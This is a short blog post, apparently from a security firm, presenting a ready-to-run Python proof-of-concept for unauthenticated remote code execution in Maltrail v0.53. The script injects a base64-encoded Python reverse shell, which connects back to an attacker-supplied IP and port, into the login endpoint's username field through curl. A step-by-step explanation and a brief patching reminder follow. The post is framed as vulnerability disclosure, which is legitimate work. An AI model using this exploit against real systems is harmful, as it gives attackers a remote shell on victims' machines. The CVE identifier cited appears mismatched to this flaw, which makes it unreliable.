Exploiting Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)

Security Lit Limited
2 min readAug 31, 2023
Photo by Kaur Kristjan on Unsplash

In this blog post, we will delve into an exploit for Maltrail v0.53, which allows for unauthenticated remote code execution (RCE). This vulnerability has been assigned the identifier CVE-2023–27163.

Overview:

Exploit Title: Maltrail v0.53 — Unauthenticated Remote Code Execution (RCE)

Exploit Author: Iyaad Luqman K (init_6)

Application: Maltrail v0.53

Tested on: Ubuntu 22.04

CVE: CVE-2023–27163

Proof of Concept (PoC):

The exploit leverages a vulnerability in the Maltrail application to execute arbitrary code on the target system. The code provided below demonstrates the exploit in action:

import sys
import os
import base64

def main():
listening_IP = None
listening_PORT = None
target_URL = None

if len(sys.argv) != 4:
print("Error. Needs listening IP, PORT and target URL.")
return(-1)

listening_IP = sys.argv[1]
listening_PORT = sys.argv[2]
target_URL = sys.argv[3] + "/login"
print("Running exploit on " + str(target_URL))
curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
payload = f'python3 -c \\'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\\''
encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64
command = f"curl '{target_url}' --data 'username=;`echo+\\"{encoded_payload}\\"+|+base64+-d+|+sh`'"
os.system(command)

if __name__ == "__main__":
main()

How the Exploit Works:

  1. The exploit script requires three arguments: the listening IP, listening PORT, and the target URL.
  2. The script constructs a payload that, when executed, will create a reverse shell connection back to the attacker’s machine.
  3. This payload is then encoded using Base64 to obfuscate its contents.
  4. A curl command is constructed to send the payload to the target URL, specifically the login endpoint.
  5. If successful, the payload is executed on the target system, granting the attacker a shell on the victim machine.

Diagram:

This exploit highlights the importance of regularly updating and patching software. Maltrail v0.53 has a critical vulnerability that allows attackers to execute arbitrary code on the target system without authentication. It’s essential to be aware of such vulnerabilities and take appropriate measures to mitigate them.

--

--